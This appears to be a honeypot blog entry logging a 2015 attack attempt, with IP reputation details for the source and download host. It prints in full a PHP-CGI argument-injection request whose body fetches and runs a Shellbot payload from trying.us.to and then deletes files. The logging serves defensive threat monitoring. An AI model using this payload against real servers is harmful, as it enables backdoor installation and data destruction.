Sonntag, 1. November 2015

5.39.251.4 - Backdoor.Perl.Shellbot.fj via trying.us.to (195.182.136.198)

BEGIN OF HTTP DATA:
2015-10-31 10:54:30
Source IP: 5.39.251.4
Country: GB RiskScore: 1 Malware: []
POST //%63%67%69%2d%62%69%6e/%70%68%70?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e HTTP/1.1
Host: -h
Content-Type: application/x-www-form-urlencoded
Content-Length: 188

<? system("cd /tmp ; wget trying.us.to/seed.jpg ; curl -O http://trying.us.to/seed.jpg ; fetch http://trying.us.to/seed.jpg ; tar -xzvf seed.jpg ; chmod +x seed ; ./seed  ; rm -rf * "); ?>
 END OF DATA
We have handled this sort of attack already in a previous blog post. The attack has not been seen since March.

195.182.136[.]198

    Static Source: GeoIP data
    Country: Russian Federation
    ASN: AS6858 Comlink Ltd

    Dynamic Source: IBM X-Force Exchange
    Score: 1.4
    Reference: https://exchange.xforce.ibmcloud.com/ip/195.182.136.198

    Dynamic Source: SANS Internet Storm Cast
    comment:IP is listed on SANS ISC
    comment:This entry alone does not indicate a threat, please check the link
    Reference: https://isc.sans.edu/api/ip/195.182.136.198

Feed search for 195.182.136[.]198
5.39.251[.]4

    Static Source: GeoIP data
    Country: United Kingdom
    ASN: AS30938 ahbr company limited

    Dynamic Source: SANS Internet Storm Cast
    comment:IP is listed on SANS ISC
    comment:This entry alone does not indicate a threat, please check the link
    Reference: https://isc.sans.edu/api/ip/5.39.251.4

Feed search for 5.39.251[.]4